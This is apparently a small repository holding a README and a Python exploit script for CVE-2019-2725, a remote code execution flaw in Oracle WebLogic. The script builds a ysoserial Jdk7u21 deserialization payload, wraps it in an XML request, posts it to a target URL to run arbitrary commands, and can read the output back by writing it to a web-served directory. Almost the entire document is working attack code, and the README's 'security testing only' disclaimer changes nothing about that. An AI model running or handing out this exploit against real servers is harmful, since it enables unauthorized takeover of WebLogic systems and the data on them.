├── README.md └── weblogic_rce.py /README.md: -------------------------------------------------------------------------------- 1 | # CNTA-2019-0014-CVE-2019-2725 2 | **免责声明:本工具仅供安全测试学习用途,禁止非法使用** 3 | ``` 4 | Usage:python3 weblogic_rce.py [url] [command] [is echo?] [win or linux] 5 | ``` 6 | 7 | 具体分析请转：https://icematcha.win/?p=1174 8 | -------------------------------------------------------------------------------- /weblogic_rce.py: -------------------------------------------------------------------------------- 1 | # __author__ = icematcha 2 | # CNVD-C-2019-48814 3 | import os 4 | import sys 5 | import requests 6 | import time 7 | 8 | 9 | def ysoserial(cmd): 10 | ysoserial_payload = f'java -Dhibernate5 -jar E:\\Tools\\ysoserial\\target\\ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 "{cmd}" > weblogic_payload' 11 | os.system(ysoserial_payload) 12 | 13 | 14 | def get_exp(file): 15 | _payload = open(file, 'rb').read() 16 | _payload = bytearray(_payload) 17 | payloads = "" 18 | payloads += ''' xxxx 19 | oracle.toplink.internal.sessions.UnitOfWorkChangeSet''' 20 | payloads += f'\n' 21 | for i, v in enumerate(_payload): 22 | if v > 128: 23 | payloads += f'\n{v-256}' 24 | else: 25 | payloads += f'\n{v}' 26 | payloads += ''' 27 | 28 | 29 | 30 | ''' 31 | return payloads 32 | 33 | 34 | def rce(url, cmd): 35 | ysoserial(cmd) 36 | payloads = get_exp(os.path.join(os.getcwd(), 'weblogic_payload')) 37 | headers = {'Content-Type': 'text/xml;charset=UTF-8'} 38 | res = requests.post(url, headers=headers, data=payloads) 39 | return res.text 40 | 41 | 42 | def Echo(url, cmd, os_name): 43 | if os_name == 'win': 44 | cmd = f'cmd /c {cmd} > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/echoxxxxx' 45 | rce(url, cmd) 46 | else: 47 | cmd = f"/bin/bash -c '{cmd} > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/echoxxxxx'" 48 | rce(url, cmd) 49 | time.sleep(2) 50 | print(requests.get(f"{'/'.join((url.split('/')[:-1]))}/echoxxxxx").text) 51 | 52 | 53 | if __name__ == '__main__': 54 | if len(sys.argv) == 3: 55 | print(rce(sys.argv[1], sys.argv[2])) 56 | elif len(sys.argv) == 5 and sys.argv[3] == 'echo': 57 | Echo(sys.argv[1], sys.argv[2], sys.argv[4]) 58 | else: 59 | print(f'\nUsage:python3 {os.path.basename(__file__)} [url] [command] [is echo?] [win or linux]') 60 | --------------------------------------------------------------------------------